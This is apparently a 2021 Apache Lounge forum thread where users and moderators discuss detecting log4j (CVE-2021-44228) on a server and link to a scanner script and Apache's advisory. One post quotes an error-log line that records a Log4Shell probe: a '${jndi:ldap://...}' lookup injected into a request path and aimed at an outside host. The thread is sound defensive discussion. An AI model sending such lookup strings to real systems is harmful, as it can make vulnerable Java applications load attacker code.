logo
Apache Lounge
Webmasters

 

About Forum Index Downloads Search Register Log in  RSS Apache Lounge  


Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

Bitcoin

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.


Post new topic   Forum Index -> Apache View previous topic :: View next topic
Reply to topic   Topic: LOG4J
Author
smallzoo



Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester

PostPosted: Mon 13 Dec '21 22:56    Post subject: LOG4J Reply with quote

Is there any way of checking if a server is using log4j anywhere

I understand this is a bad security risk and needs to be sorted asap

Thanks
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7061
Location: Germany, Next to Hamburg

PostPosted: Mon 13 Dec '21 23:50    Post subject: Reply with quote

Hi!
That doesn't apply to httpd apache. Only if you run apache tomcat with log4j or any other Java based software usinf log4j. And then you can search for a log4j**.jar file.
Back to top
smallzoo



Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester

PostPosted: Mon 13 Dec '21 23:57    Post subject: Reply with quote

James Blond wrote:
Hi!
That doesn't apply to httpd apache. Only if you run apache tomcat with log4j or any other Java based software usinf log4j. And then you can search for a log4j**.jar file.


sorry for the dumb question, how do I know if the site is running https apache or tomcat ?
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7061
Location: Germany, Next to Hamburg

PostPosted: Tue 14 Dec '21 0:02    Post subject: Reply with quote

I can't tell you if you run httpd apache or tomcat.

But there is a script to figure that out See also https://hope-this-helps.de/serendipity/archives/POWERSHELL-scan-nach-log4j-681.html
Back to top
dmye



Joined: 23 Nov 2021
Posts: 3

PostPosted: Tue 14 Dec '21 6:39    Post subject: Reply with quote

James Blond wrote:
I can't tell you if you run httpd apache or tomcat.

But there is a script to figure that out See also https://hope-this-helps.de/serendipity/archives/POWERSHELL-scan-nach-log4j-681.html


[core:error] (20024)The given path is misformatted or contained invalid characters: [client 1.2.3.4..] AH00127: Cannot map GET /$%7Bjndi:ldap://1.2.3.4..

Why not authz_core:error?core:error it will be becaus Directory bypass ?
Back to top
smallzoo



Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester

PostPosted: Tue 14 Dec '21 11:27    Post subject: Reply with quote

The website is hosted on Amazon EC2

I can see now that there is a simple patch but what is the console command to check for ever occurrence of log4j in a filename and also in any third party jar file ?

thanks
Back to top
Steffen
Moderator


Joined: 15 Oct 2005
Posts: 2905
Location: Hilversum, NL, EU

PostPosted: Tue 14 Dec '21 15:36    Post subject: Reply with quote

List of Apache projects affected by log4j CVE-2021-44228

https://blogs.apache.org/security/entry/cve-2021-44228
Back to top


Reply to topic   Topic: LOG4J View previous topic :: View next topic
Post new topic   Forum Index -> Apache